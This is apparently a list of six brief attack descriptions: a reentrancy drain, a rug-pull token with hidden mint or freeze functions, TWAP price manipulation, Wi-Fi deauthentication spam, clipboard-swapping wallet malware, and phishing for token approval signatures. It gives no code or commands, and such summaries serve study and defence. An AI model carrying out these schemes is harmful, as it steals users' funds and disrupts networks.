Vulnerable contract sends ETH before updating its state — attacker contract re-enters the withdraw function in fallback, drains funds (classic DAO 2016).

Deploy a token with a hidden mint / blacklist / transfer-fee function. Once liquidity is sufficient, mint + dump or freeze holders.

Manipulate a V3 pool's tick range with concentrated liquidity to swing the in-block TWAP — exploit consumer contracts using short TWAPs.

Spam 802.11 deauth frames at clients of a target AP — disrupts service, also a primer for handshake capture / evil twin.

Malware monitors clipboard for crypto-address regex; silently substitutes the attacker's address — victim pastes + signs the wrong destination.

Crafted dApp tricks the victim into signing eth_signTypedData / setApprovalForAll / permit — instant drain of NFTs and tokens.